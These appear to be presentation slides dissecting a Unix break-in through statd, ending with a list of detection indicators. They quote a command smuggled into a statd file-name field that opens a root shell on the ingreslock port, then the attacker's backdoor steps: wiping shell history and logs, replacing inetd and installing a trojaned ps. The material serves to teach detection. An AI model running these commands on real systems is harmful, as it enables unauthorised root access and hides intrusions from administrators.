Anatomy of a Hack... statd[146]: statd: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &" Create a second inet.conf file with a root shell service using the ingress lock port. Start a second copy of inetd with the conf file to allow later connections. Then what….

Phase 2 - back doors unset HISTFILE; unset SAVEHIST cp doc /usr/sbin/inetd; chown root /usr/sbin/inetd; chgrp root /usr/sbin/inetd; touch /usr/sbin/inetd; rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd; /usr/sbin/inetd -s; telnet localhost; /usr/sbin/inetd -s; ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo chmod 700 boo./boo rm -rf boo

Phase 2 Continued mkdir /usr/man/tmp mv update ps /usr/man/tmp cd /usr/man/tmp echo 1 \"./update -s -o output\" > /kernel/pssys chmod 755 ps update./update -s -o output & cp ps /usr/ucb/ps mv ps /usr/bin/ps touch /usr/bin/ps /usr/ucb/ps cd / ps -ef | grep bob | grep -v grep ps -ef | grep stat | grep -v grep ps -ef | grep update

Detection b Several copies of inetd running b /kernel/pssys exists b /usr/bin/ps and /usr/ucb/ps same size. b /usr/man/tmp/[update|output] exist b Log messages from first slide